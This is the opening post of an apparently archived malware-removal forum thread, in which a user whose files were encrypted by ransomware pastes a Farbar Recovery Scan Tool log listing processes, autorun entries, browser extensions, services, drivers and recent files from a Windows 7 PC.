infected with Cryptolocker - all files are encrypted...


  • This topic is locked
18 replies to this topic

#1 sachyani
  • Members
  • 16 posts

Posted 24 June 2017 - 09:22 PM

Here are my log files:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 24-06-2017 01
Ran by Sachyani (administrator) on LANDBASE (24-06-2017 22:44:17)
Running from C:\Users\Sachyani\Downloads
Loaded Profiles: Sachyani (Available Profiles: Sachyani)
Platform: Microsoft Windows 7 Home Premium  Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\Antivirus\sched.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(ZSMCSNAP) C:\Windows\ZSSnp211.exe
() C:\Windows\Domino.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\Antivirus\avgnt.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\System Speedup\Avira.SystemSpeedup.UI.Systray.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\Antivirus\avguard.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\VPN\Avira.VpnService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\Antivirus\avscan.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\Antivirus\avscan.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\SoftwareUpdater\Avira.SoftwareUpdater.ServiceHost.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(@ByELDI) C:\Program Files\KMSpico\Service_KMS.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\System Speedup\Avira.SystemSpeedup.SpeedupService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\Launcher\Avira.ServiceHost.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\Antivirus\avshadow.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\Launcher\Avira.Systray.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ZSSnp211] => C:\Windows\ZSSnp211.exe [57344 2007-04-06] (ZSMCSNAP)
HKLM\...\Run: [Domino] => C:\Windows\Domino.exe [49152 2006-08-18] ()
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [8546848 2010-03-26] (Realtek Semiconductor)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [267064 2017-05-09] (Apple Inc.)
HKLM\...\Run: [Avira SystrayStartTrigger] => C:\Program Files\Avira\Launcher\Avira.SystrayStartTrigger.exe [97512 2017-06-08] (Avira Operations GmbH & Co. KG)
HKLM\...\Run: [Avira System Speedup User Starter] => C:\Program Files\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe [66656 2017-06-13] (Avira Operations GmbH & Co. KG)
HKLM\...\Run: [avgnt] => C:\Program Files\Avira\Antivirus\avgnt.exe [918008 2017-06-02] (Avira Operations GmbH & Co. KG)
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\...\Run: [{C4B700E8-006B-9D20-AB99-2B0C8AECF8C0}] => C:\ProgramData\Microsoft\Performance\TheftProtection\temp\tmp37A2.exe <===== ATTENTION
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\...\Run: [*kszo<*>] => "C:\Users\Sachyani\AppData\Local\752c\1cd2.bat" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\...\Run: [27867b84] => C:\Users\Sachyani\AppData\Roaming\Microsoft\wxdsys.exe
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\...409d6c4515e9\InprocServer32: [Default-shell32] C:\Users\Sachyani\AppData\Local\Ilsoft\mpqzunnc.dll ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 213.57.2.5 213.57.22.5
Tcpip\..\Interfaces\{9A6BF225-4E1A-437E-94A0-42674B6766C5}: [DhcpNameServer] 213.57.2.5 213.57.22.5
 
Internet Explorer:
==================
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2017-04-11] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2017-02-23] (Microsoft Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2016-10-11] (Microsoft Corporation)
 
FireFox:
========
FF DefaultProfile: l6e3v380.default
FF ProfilePath: C:\Users\Sachyani\AppData\Roaming\Mozilla\Firefox\Profiles\l6e3v380.default [2017-06-24]
FF Extension: (Avira Browser Safety) - C:\Users\Sachyani\AppData\Roaming\Mozilla\Firefox\Profiles\l6e3v380.default\Extensions\abs@avira.com [2017-06-24]
FF Extension: (Avira Password Manager) - C:\Users\Sachyani\AppData\Roaming\Mozilla\Firefox\Profiles\l6e3v380.default\Extensions\passwordmanager@avira.com [2017-06-24]
FF Extension: (Avira SafeSearch Plus) - C:\Users\Sachyani\AppData\Roaming\Mozilla\Firefox\Profiles\l6e3v380.default\Extensions\safesearchplus2@avira.com [2017-06-24]
FF Plugin: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-12-13] (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin: @scout.avira-update.com/Avira Scout Update;version=3 -> C:\Program Files\Avira\Scout Update\1.3.32.7\npScoutUpdate3.dll [2017-06-24] (Avira Operations GmbH & Co. KG)
FF Plugin: @scout.avira-update.com/Avira Scout Update;version=9 -> C:\Program Files\Avira\Scout Update\1.3.32.7\npScoutUpdate3.dll [2017-06-24] (Avira Operations GmbH & Co. KG)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2016-12-13] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\itms.js [2017-05-09]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR DefaultSearchURL: Default -> hxxps://search.avira.com/#web/result?source=omnibar&q={searchTerms}
CHR DefaultSearchKeyword: Default -> Avira
CHR DefaultSuggestURL: Default -> hxxps://search.avira.com/suggestions?q={searchTerms}&li=ff&hl=en
CHR Profile: C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default [2017-06-24]
CHR Extension: (Google מצגות) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-02-18]
CHR Extension: (Google Docs) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-02-18]
CHR Extension: (כונן Google) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-02-18]
CHR Extension: (YouTube) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-02-18]
CHR Extension: (Avira Password Manager) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\caljgklbbfbcjjanaijlacgncafpegll [2017-06-24]
CHR Extension: (Adblock Plus) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-03-27]
CHR Extension: (Google Sheets) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-02-18]
CHR Extension: (Google Docs Offline) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-02-18]
CHR Extension: (Flash Control) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdgadgplbbdjlbjgdociahdlmbglfeen [2017-05-28]
CHR Extension: (Avira SafeSearch Plus) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\ipmkfpcnmccejididiaagpgchgjfajgp [2017-06-24]
CHR Extension: (Save to Facebook) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmfikkaogpplgnfjmbjdpalkhclendgd [2017-03-15]
CHR Extension: (Local SWF Player) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdmbckedabpbgjagmkgcejooabcdnone [2017-02-25]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-12]
CHR Extension: (Gmail) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-02-18]
CHR Extension: (Chrome Media Router) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-06-02]
CHR HKLM\...\Chrome\Extension: [caljgklbbfbcjjanaijlacgncafpegll] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ipmkfpcnmccejididiaagpgchgjfajgp] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 AntiVirMailService; C:\Program Files\Avira\Antivirus\avmailc7.exe [1128432 2017-06-02] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files\Avira\Antivirus\sched.exe [490968 2017-06-02] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files\Avira\Antivirus\avguard.exe [490968 2017-06-02] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files\Avira\Antivirus\avwebg7.exe [1524216 2017-06-02] (Avira Operations GmbH & Co. KG)
R2 Avira.ServiceHost; C:\Program Files\Avira\Launcher\Avira.ServiceHost.exe [356256 2017-06-08] (Avira Operations GmbH & Co. KG)
R2 AviraPhantomVPN; C:\Program Files\Avira\VPN\Avira.VpnService.exe [334064 2017-05-18] (Avira Operations GmbH & Co. KG)
R2 AviraUpdaterService; C:\Program Files\Avira\SoftwareUpdater\Avira.SoftwareUpdater.ServiceHost.exe [100816 2017-04-21] (Avira Operations GmbH & Co. KG)
S2 scupdate; C:\Program Files\Avira\Scout Update\ScoutUpdate.exe [116312 2017-06-24] (Avira Operations GmbH & Co. KG)
S3 scupdatem; C:\Program Files\Avira\Scout Update\ScoutUpdate.exe [116312 2017-06-24] (Avira Operations GmbH & Co. KG)
R2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [965776 2014-10-26] (@ByELDI) [File not signed]
R2 SpeedupService; C:\Program Files\Avira\System Speedup\Avira.SystemSpeedup.SpeedupService.exe [74800 2017-06-13] (Avira Operations GmbH & Co. KG)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R0 avdevprot; C:\Windows\System32\DRIVERS\avdevprot.sys [46440 2017-06-02] (Avira Operations GmbH & Co. KG)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [124232 2017-06-02] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [142712 2017-06-02] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [35840 2017-06-02] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\System32\DRIVERS\avnetflt.sys [59000 2017-06-02] (Avira Operations GmbH & Co. KG)
R0 avusbflt; C:\Windows\System32\Drivers\avusbflt.sys [23304 2017-06-02] (Avira Operations GmbH & Co. KG)
R3 vvftav211; C:\Windows\System32\drivers\vvftav211.sys [480128 2007-12-10] (Vimicro Corporation) [File not signed]
R3 ZSMC30x; C:\Windows\System32\Drivers\ZS211.sys [1472000 2007-12-13] (ZSMC.Corporation) [File not signed]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-06-24 22:44 - 2017-06-24 22:47 - 00014081 _____ C:\Users\Sachyani\Downloads\FRST.txt
2017-06-24 22:43 - 2017-06-24 22:44 - 00000000 ____D C:\FRST
2017-06-24 22:42 - 2017-06-24 22:42 - 01779712 _____ (Farbar) C:\Users\Sachyani\Downloads\FRST.exe
2017-06-24 22:23 - 2017-06-24 22:23 - 00000000 ____D C:\Users\Sachyani\Desktop\OrganiZen
2017-06-24 22:18 - 2017-06-24 22:27 - 00000000 ____D C:\Program Files\Mozilla Firefox
2017-06-24 22:06 - 2017-06-24 22:06 - 02563616 _____ (Kaspersky Lab) C:\Users\Sachyani\Downloads\kis17.0.0.611aben_de_es_nl_it_fr_11638.exe
2017-06-24 21:38 - 2017-06-24 21:38 - 01340848 _____ (Emsisoft Ltd) C:\Users\Sachyani\Downloads\decrypt_pclock2.exe
2017-06-24 21:33 - 2017-06-24 22:08 - 00000000 ____D C:\ProgramData\ParetoLogic
2017-06-24 21:33 - 2017-06-24 21:33 - 00000000 ____D C:\Program Files\ParetoLogic
2017-06-24 21:31 - 2017-06-24 21:31 - 02936752 _____ (ParetoLogic) C:\Users\Sachyani\Downloads\Pareto_DR_Setup_RW.exe
2017-06-24 00:21 - 2017-06-24 00:21 - 00000000 ____D C:\Users\Sachyani\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Avira
2017-06-24 00:12 - 2017-06-24 00:12 - 00000000 ____D C:\Users\Sachyani\AppData\Roaming\Avira
2017-06-24 00:10 - 2017-06-24 00:10 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_avusbflt_01011.Wdf
2017-06-24 00:09 - 2017-06-02 19:05 - 00142712 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avipbb.sys
2017-06-24 00:09 - 2017-06-02 19:05 - 00124232 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avgntflt.sys
2017-06-24 00:09 - 2017-06-02 19:05 - 00059000 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avnetflt.sys
2017-06-24 00:09 - 2017-06-02 19:05 - 00046440 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avdevprot.sys
2017-06-24 00:09 - 2017-06-02 19:05 - 00035840 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avkmgr.sys
2017-06-24 00:09 - 2017-06-02 19:05 - 00023304 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avusbflt.sys
2017-06-24 00:07 - 2017-06-24 00:07 - 00002094 _____ C:\Users\Public\Desktop\Avira Scout.lnk
2017-06-24 00:05 - 2017-06-24 00:21 - 00000000 ____D C:\Users\Sachyani\AppData\Local\Avira
2017-06-24 00:04 - 2017-06-24 00:37 - 00000000 ____D C:\Users\Public\Speedup Sessions
2017-06-24 00:04 - 2017-06-24 00:04 - 00000998 _____ C:\Users\Public\Desktop\Avira Phantom VPN.lnk
2017-06-24 00:03 - 2017-06-24 00:03 - 00002036 _____ C:\Users\Public\Desktop\Avira Software Updater.lnk
2017-06-24 00:02 - 2017-06-24 00:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2017-06-24 00:02 - 2017-06-24 00:09 - 00000000 ____D C:\ProgramData\Avira
2017-06-24 00:02 - 2017-06-24 00:09 - 00000000 ____D C:\Program Files\Avira
2017-06-24 00:02 - 2017-06-24 00:02 - 00001166 _____ C:\Users\Public\Desktop\Avira Connect.lnk
2017-06-24 00:02 - 2017-06-24 00:02 - 00000000 ____D C:\ProgramData\Package Cache
2017-06-24 00:01 - 2017-06-24 00:01 - 04799712 _____ (Avira Operations GmbH & Co. KG) C:\Users\Sachyani\Downloads\avira_en_fass0_594d81a9523e4__ws.exe
2017-06-20 14:56 - 2017-06-20 14:56 - 15791980 _____ C:\Users\Sachyani\cl_data_1Ew9VF9CUNyRYEBU3A33eq37iB5RYSESHk.bak
2017-06-18 21:56 - 2017-06-18 21:56 - 00153711 _____ C:\Users\Sachyani\Downloads\לא מאושר 436394.crdownload
2017-06-14 23:07 - 2017-06-02 11:09 - 01549824 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2017-06-14 23:07 - 2017-06-02 11:09 - 01400320 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2017-06-14 23:07 - 2017-06-02 11:09 - 00666624 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2017-06-14 23:07 - 2017-06-02 11:09 - 00337408 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2017-06-14 23:07 - 2017-06-02 11:09 - 00197120 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2017-06-14 23:07 - 2017-06-02 11:09 - 00104448 _____ (Microsoft Corporation) C:\Windows\system32\mssitlb.dll
2017-06-14 23:07 - 2017-06-02 11:09 - 00059392 _____ (Microsoft Corporation) C:\Windows\system32\msscntrs.dll
2017-06-14 23:07 - 2017-06-02 11:09 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2017-06-14 23:07 - 2017-06-02 10:58 - 00427520 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2017-06-14 23:07 - 2017-06-02 10:58 - 00164352 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2017-06-14 23:07 - 2017-06-02 10:57 - 00497152 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2017-06-14 23:07 - 2017-06-02 10:57 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\SearchFilterHost.exe
2017-06-14 23:07 - 2017-06-02 10:57 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\msshooks.dll
2017-06-14 23:07 - 2017-05-21 07:10 - 00137960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-06-14 23:07 - 2017-05-21 07:10 - 00067304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2017-06-14 23:07 - 2017-05-21 07:06 - 01062912 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00655360 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00553472 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00261120 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00254464 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00172032 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00141312 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00099840 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-06-14 23:07 - 2017-05-21 06:46 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-06-14 23:07 - 2017-05-21 06:43 - 00226304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-06-14 23:07 - 2017-05-21 06:42 - 00124416 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-06-14 23:07 - 2017-05-21 06:42 - 00098304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-06-14 23:07 - 2017-05-21 06:42 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-06-14 23:07 - 2017-05-21 06:42 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-06-14 23:07 - 2017-05-21 06:42 - 00015872 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-06-14 23:07 - 2017-05-16 20:35 - 00346320 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-06-14 23:07 - 2017-05-14 22:37 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-06-14 23:07 - 2017-05-14 22:37 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-06-14 23:07 - 2017-05-14 22:23 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-06-14 23:07 - 2017-05-14 22:22 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-06-14 23:07 - 2017-05-14 22:22 - 00341504 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-06-14 23:07 - 2017-05-14 22:22 - 00047616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-06-14 23:07 - 2017-05-14 22:21 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-06-14 23:07 - 2017-05-14 22:16 - 02290176 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-06-14 23:07 - 2017-05-14 22:15 - 00047104 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-06-14 23:07 - 2017-05-14 22:14 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-06-14 23:07 - 2017-05-14 22:12 - 00476160 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-06-14 23:07 - 2017-05-14 22:11 - 20274688 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-06-14 23:07 - 2017-05-14 22:11 - 00115712 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-06-14 23:07 - 2017-05-14 22:11 - 00104960 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-06-14 23:07 - 2017-05-14 22:10 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-06-14 23:07 - 2017-05-14 22:10 - 00620032 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-06-14 23:07 - 2017-05-14 22:05 - 00667648 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-06-14 23:07 - 2017-05-14 22:02 - 00416256 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-06-14 23:07 - 2017-05-14 21:57 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-06-14 23:07 - 2017-05-14 21:57 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-06-14 23:07 - 2017-05-14 21:56 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-06-14 23:07 - 2017-05-14 21:53 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-06-14 23:07 - 2017-05-14 21:52 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-06-14 23:07 - 2017-05-14 21:50 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-06-14 23:07 - 2017-05-14 21:49 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-06-14 23:07 - 2017-05-14 21:44 - 04549120 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-06-14 23:07 - 2017-05-14 21:42 - 00230400 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-06-14 23:07 - 2017-05-14 21:40 - 00693248 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-06-14 23:07 - 2017-05-14 21:40 - 00689664 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-06-14 23:07 - 2017-05-14 21:39 - 02057216 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-06-14 23:07 - 2017-05-14 21:38 - 01155072 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-06-14 23:07 - 2017-05-14 21:30 - 13664768 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-06-14 23:07 - 2017-05-14 21:15 - 02767872 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-06-14 23:07 - 2017-05-14 21:11 - 01314816 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-06-14 23:07 - 2017-05-14 21:11 - 00710144 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-06-14 23:07 - 2017-05-12 21:07 - 04001000 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2017-06-14 23:07 - 2017-05-12 21:07 - 03945704 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-06-14 23:07 - 2017-05-12 21:07 - 00308456 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2017-06-14 23:07 - 2017-05-12 21:04 - 01310528 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00644096 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00629760 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00400896 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00306688 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
